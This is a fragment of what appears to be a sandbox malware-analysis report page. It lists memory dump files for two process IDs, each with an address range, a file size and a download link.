                                    Download

                                  • memory/4300-49-0x0000000074C10000-0x00000000753C0000-memory.dmp

                                    Filesize

                                    7.7MB

                                    Download

                                  • memory/4300-48-0x0000000074C1E000-0x0000000074C1F000-memory.dmp

                                    Filesize

                                    4KB

                                    Download

                                  • memory/4300-21-0x0000000005960000-0x0000000005F88000-memory.dmp

                                    Filesize

                                    6.2MB

                                    Download

                                  • memory/4676-46-0x00007FFF16A70000-0x00007FFF17531000-memory.dmp

                                    Filesize

                                    10.8MB

                                    Download

                                  • memory/4676-60-0x00007FFF16A70000-0x00007FFF17531000-memory.dmp

                                    Filesize

                                    10.8MB

                                    Download

                                  • memory/4676-45-0x00007FFF16A73000-0x00007FFF16A75000-memory.dmp

                                    Filesize

                                    8KB

                                    Download

                                  • memory/4676-2-0x00007FFF16A73000-0x00007FFF16A75000-memory.dmp

                                    Filesize

                                    8KB

                                    Download

                                  • memory/4676-15-0x00007FFF16A70000-0x00007FFF17531000-memory.dmp

                                    Filesize

                                    10.8MB

                                    Download

                                  • memory/4676-14-0x00007FFF16A70000-0x00007FFF17531000-memory.dmp

                                    Filesize

                                    10.8MB

                                    Download

                                  • memory/4676-13-0x00007FFF16A70000-0x00007FFF17531000-memory.dmp

                                    Filesize

                                    10.8MB

                                    Download

                                  • memory/4676-3-0x000001C9DC570000-0x000001C9DC592000-memory.dmp

                                    Filesize

                                    136KB

                                    Download